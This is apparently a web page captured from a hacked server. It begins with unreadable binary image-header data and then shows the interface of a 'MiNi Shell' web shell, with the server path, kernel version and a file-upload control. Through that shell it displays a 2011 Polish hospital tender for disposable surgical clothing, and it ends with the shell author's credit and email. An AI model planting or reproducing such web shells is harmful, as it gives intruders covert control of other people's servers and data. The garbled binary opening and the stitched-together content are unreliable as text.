JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110111/12089-N-2011.html

<p class="kh_header"><b>Kamienna Góra: dostawa jednorazowej odzieży ochronnej z fizeliny</b><br>
<b>Numer ogłoszenia: 12089 - 2011; data zamieszczenia: 11.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa jednorazowej odzieży ochronnej z fizeliny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest dostawa jednorazowej odzieży ochronnej z fizeliny przedmiot zamówienia jest podzielny i składa się  z  9  pakietów. 

pakiet nr 1  - odzież ochronna jednorazowego użytku z fizeliny 

pakiet nr 2   - maski ochronne 3 warstwowe wiązane, niejałowe

pakiet nr 3 - uniwersalne fartuchy foliowe operacyjne białe, grube, niejałowe

pakiet nr  4 - bielizna operacyjna jednorazowa, zielona 

pakiet nr  5  - obłożenia  sterylne jednorazowe, samoprzylepne, zielone 

pakiet nr  6 - pozostały asortyment operacyjny, sterylny, jednorazowy 

pakiet nr 7  - osłona na kończynę 

pakiet nr 8 - prześcieradła ochronne niejałowe, jednorazowego użytku 

pakiet nr 9 - zestaw jałowych serwet do cięcia cesarskiego 
 
Przewidywane zużycie wyżej wymienionego asortymentu jest zamieszczone w formularzu cenowym będącym załącznikiem nr g  do niniejszej specyfikacji istotnych warunków zamówienia.  

Warunki podstawowe / minimalne  dla przedmiotu zamówienia:
Zamawiane towary  winny spełniać wszystkie wymagania stawiane  opatrunkom, które powinny być dopuszczone do obrotu /zarejestrowane zgodnie z obowiązującymi  przepisami oraz:
1)oferowane towary  winny odpowiadać parametrom i opisowi podanemu w formularzu cenowym  zał nr g podanym przez Zamawiającego  w siwz; 
2)towary będące przedmiotem  sprzedaży będą dostarczane Zamawiającemu w opakowaniach zabezpieczających jakość dostarczonych towarów i odpowiadających warunkom transportu, odbioru i przechowywania; zamawiany towar  powinien posiadać bezpieczny termin ważności pozwalający na jego  magazynowanie i  prawidłowy odczyt - stemplowany na etykiecie pudełka,  w tym okresie firma winna gwarantować   zachowanie przez towar  pełnej wartości użytkowej, na opakowaniu winna być podana data produkcji, numer serii. Termin ważności   musi gwarantować przydatność  asortymentu do użycia w   okresie  nie krótszym niż 12 miesięcy od daty  zakupu  z wyjątkiem towaru o terminie ważności  krótszym.
3)oferowany  towar   winien  odpowiadać  opisowi podanemu w formularzu cenowym zał nr g.
Uwaga: Zamawiający wymaga posiadania daty ważności na opakowaniach oferowanych produktów tylko w przypadku konkretnych wyrobów medycznych z których właściwości wynika konieczność wskazania terminu przydatności zgodnie z pkt. 13.3 ppkt. 12 załącznika nr 1 do Rozporządzenia z dnia 3 listopada 2004r.  w sprawie wymagań zasadniczych dla wyrobów medycznych do różnego przeznaczenia (Dz. U. Nr 251, poz. 2514).  
 Dodatkowo parametry techniczne  dla przedmiotu zamówienia odpowiednio:


Warunki minimalne - pakiet nr 1:

Zamawiający zamawia odzież ochronną  jedn. użytku z fizeliny o parametrach określonych w formularzu cenowym zał nr g 

Zamawiający dopuszcza niewielkie odchylenia +/- 10% w rozmiarach powyższego asortymentu jednakże należy zwrócić się na piśmie do  Zamawiającego z  taka informacją i uzyskać jego zgodę art. 38.
          

Warunki minimalne - pakiet nr 2:

Zamawiający zamawia odzież ochronną  jedn. użytku z fizeliny o parametrach określonych w formularzu cenowym zał nr g 

-    maski mają być wykonane z bezzapachowej włókniny,
-    winny mieć usztywnianą część na nos,
-    z filtrem o wysokiej efektywności filtracji bakteryjnej 

Zamawiający dopuszcza niewielkie odchylenia +/- 10% w rozmiarach powyższego asortymentu  jednakże należy zwrócić się na piśmie do zamawiającego z  taka informacją i uzyskać jego zgodę art. 38.


Warunki minimalne - pakiet nr 3:

Zamawiający zamawia odzież ochronną  jedn. użytku z fizeliny o parametrach określonych w formularzu cenowym zał nr g 
Fartuchy  wininny  być zakładane  przez głowę oraz mieć troczek (wiązane z tyłu) Minimalna grubość  zamawianego fartucha winna wynosić 0,04 mm lub 40 mikronów. 

Warunki minimalne - pakiet nr 4:

Zamawiający zamawia odzież ochronną  jedn. użytku z fizeliny o parametrach określonych w formularzu cenowym zał nr g 
 
 poz. 1 - 3 winna bycz godna z EN 13795 1-3; gramatura minimum 40g/m2, posiadający dodatkowe nieprzemakalne wzmocnienia w części przedniej i w rękawach. Rękaw zakończony elastycznym mankietem z dzianiny. Tylne części fartucha zachodzą na siebie. Umiejscowienie troków w specjalnym kartoniku, umożliwiające zawiązanie ich zgodnie  z procedurami postępowania aseptycznego - zachowanie pełnej sterylności tylnej części fartucha. Szwy wykonane techniką ultradźwiękową. Odporność na przesiąkanie płynów materiału stanowiącego wzmocnienia min. 295 mm H2O natomiast BI=6
poz. 4 - 6: 

-  komplety  nie jałowe w kolorze zielonym z włókniny polipropylenowej typu SMS 

Zamawiający dopuszcza niewielkie odchylenia +/- 10% w rozmiarach powyższego asortymentu  jednakże należy zwrócić się na piśmie do zamawiającego z  taka informacją i uzyskać jego zgodę art.38. 


Warunki minimalne - pakiet nr 5:

Zamawiający zamawia odzież ochronną  jedn. użytku z fizeliny o parametrach określonych w formularzu cenowym zał nr g 

winien być nieprzepuszczalny dla płynów ustrojowych i drobnoujstrojów 
winien mieć właściwości antystatyczne, chłonne 
winien nie stwarzać problemów z utylizacją,
oraz  być odporny na uszkodzenia mechaniczne
obłożenia pola operacyjnego winny być min. 2 warstwowe  - wykonane z laminatu polietylenowego, składającego się z folii barierowej i z warstwy chłonnej (wiskozowej) w stosunku do płynów i mikroorganizmów; folia zabezpieczająca przed przesiąkaniem z pełną bariera biologiczną 
nie może zawierać bibuły celulozowej, niepaląca 
gramatura min. 57g/m2
min. wytrzymałość na rozciąganie w stanie mokrym 
musi posiadać informacje o dacie ważności i nr serii 

Zamawiający  dopuszcza tolerancję do podanego   wyżej rozmiaru  asortymentu  +/-   10%, jednakże należy wcześniej poinformować o takim fakcie Zamawiającego i uzyskać jego zgodę w trybie art. 38. 


Warunki minimalne - pakiet nr 6:

Zamawiający zamawia odzież ochronną  jedn. użytku z fizeliny o parametrach określonych w formularzu cenowym zał nr g 
winien być nieprzepuszczalny dla płynów ustrojowych i drobnoustrojów 
winien mieć właściwości antystatyczne, chłonne 
winien nie stwarzać problemów z utylizacją,
oraz  być odporny na uszkodzenia mechaniczne
musi posiadać informacje o dacie ważności i nr serii
dodatkowo poz. 5 winna być wykonana z włókniny polipropylenowej
dodatkowo poz. 6 winna być wykonana z włókniny polietylenowo - wiskozowej lub polipropylenu z zewnątrz  warstwa  wewnętrzna  z folii nieprzepuszczającej  
dodatkowo poz. 1,2,3,4  oraz 7:
winna być min. 2 warstwowa  - wykonana z laminatu polietylenowego, składającego się z folii barierowej i z warstwy chłonnej (wiskozowej) w stosunku do płynów i mikroorganizmów; folia zabezpieczająca przed przesiąkaniem z pełną bariera biologiczną 
nie może zawierać bibuły celulozowej, niepaląca 
gramatura min.    57g/m2
min. wytrzymałość na rozciąganie w stanie mokrym

Zamawiający  dopuszcza tolerancję do podanego   wyżej rozmiaru  asortymentu  +/-  10%, jednakże należy wcześniej poinformować o takim fakcie Zamawiającego i uzyskać jego zgodę w trybie art. 38. 

 Warunki minimalne - pakiet nr 7:

Zamawiający zamawia odzież ochronną  jedn. użytku z fizeliny o parametrach określonych w formularzu cenowym zał nr g 


Zamawiający  dopuszcza tolerancję do podanego   wyżej rozmiaru  asortymentu  +/-   10%, jednakże należy wcześniej poinformować o takim fakcie Zamawiającego i uzyskać jego zgodę w trybie art. 38. 

 Warunki minimalne - pakiet nr 8:

Zamawiający zamawia odzież ochronną  jedn. użytku z fizeliny o parametrach określonych w formularzu cenowym zał nr g 


Zamawiający  dopuszcza tolerancję do podanego   wyżej rozmiaru  asortymentu  +/-   10%, jednakże należy wcześniej poinformować o takim fakcie Zamawiającego i uzyskać jego zgodę w trybie art. 38. 


 Warunki minimalne - pakiet nr 9:

Zamawiający zamawia odzież ochronną  jedn. użytku z fizeliny o parametrach określonych w formularzu cenowym zał nr g 


Zamawiający  dopuszcza tolerancję do podanego   wyżej rozmiaru  asortymentu  +/-   10%, jednakże należy wcześniej poinformować o takim fakcie Zamawiającego i uzyskać jego zgodę w trybie art. 38..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 17.20.00.00-4, 17.21.20.00-1, 17.21.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">-       Zgodnie z art. 9 ust. 4 ustawy z dnia 30 sierpnia 1991r. o zakładach opieki zdrowotnej Dz. U. z 1991r. Nr 91, poz. 408, z późniejszymi zmianami, na mocy której zakłady opieki zdrowotnej nabywają i stosują wyroby medyczne  - odpowiadające wymaganiom ustawy z dnia 20 kwietnia  2004r. o wyrobach medycznych (Dz. U. Nr 93, poz. 896)  oraz Rozporządzeniem Ministra Zdrowia z dnia 30 kwietnia 2004r. w sprawie klasyfikacji wyrobów medycznych do różnego przeznaczenia (Dz. U. z dnia 1 maja 2004r.) w celu potwierdzenia bezpieczeństwa i jakości oferowanych wyrobów Zamawiający   wymaga złożenia w ofercie dokumentów potwierdzających powyższy wymóg.   
         W tym celu Wykonawca winien pisemnie potwierdzić, czy oferowany przez niego towar  w danym przetargu jest  wyrobem medycznym, a jeśli tak, to należy  załączyć do oferty dokumenty potwierdzające dopuszczenie wyrobu medycznego do obrotu na terytorium  RP w formie oryginału lub kserokopii  potwierdzonych  za zgodność z oryginałem przez Wykonawcę tj.:
deklaracja zgodności z wymogami zasadniczymi wystawiona przez producenta (dotyczy wszystkich klas wyrobów medycznych);
certyfikat CE j. Notyfikowanej (dotyczy klas wyrobów medycznych: I sterylna, I z funkcją pomiarową, II a, II b, III);
wpis/zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania (nie dotyczy klasy wyrobu medycznego I i II a pod warunkiem, że jego pierwsze wprowadzenie do obrotu nastąpiło w innym niż Polska kraju Unii Europejskiej, zgodnie z przepisami ustawy z dnia 20.04.2004 r. o wyrobach medycznych)   lub   złożyć   oświadczenie, iż oferowany towar  posiada dopuszczenie do obrotu zgodnie z ustawą z dnia 20.04.2004r. o wyrobach medycznych, oraz zobowiązanie Wykonawcy do przedstawienia tych dokumentów na każde wezwanie Zamawiającego</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)  w przypadku zakończenia produkcji lub wycofania z rynku wyrobu będącego przedmiotem zamówienia dopuszcza się  zmianę na  nowy produkt o tych samych bądź lepszych parametrach po cenie jednostkowej zaoferowanej w ofercie, 
        2)  zmiana osób upoważnionych do odbioru/ kontaktów, 
        3)  zmiana rachunku bankowego i innych danych stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE  CENTRUM ZDROWIA w KAMIENNEJ GÓRZE  Sp. z o. o. 
NZOZ Szpital Powiatowy 
58-400 KAMIENNA GÓRA
ul. Bohaterów Getta 10, woj. dolnośląskie 
dział zam publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2011 godzina 10:00, miejsce: SEKRETARIAT 
POWIATOWE  CENTRUM ZDROWIA w KAMIENNEJ GÓRZE  Sp. z o. o. 
NZOZ Szpital Powiatowy 
58-400 KAMIENNA GÓRA
ul. Bohaterów Getta 10, woj. dolnośląskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> odzież ochronna jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet zawiera 9 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.20.00.00-4, 17.21.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> maski ochronne 3 warstwowe wiązane niejałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 2 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.21.80.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> uniwersalne fartuchy foliowe operacyjne białe grube, niejałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 1 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.20.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> bielizna operacyjna jednorazowa, zielona.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 7 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.21.80.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> obłożenia sterylne jednorazowe, zielone samoprzylepne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 1 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.20.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> pozostały asortyment operacyjny, sterylny jednorazowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 5 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.21.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> pozostały asortyment  operacyjny, sterylny, jednorazowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 5 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.20.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> osłona na kończynę.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 1 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.21.00.20-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> prześcieradła ochronne niejałowe, jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 1 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.21.80.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> zestaw jałowych serwet docięcia cesarskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z serwet, taśmy, ręczników i fartuchów chirurgicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.21.80.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com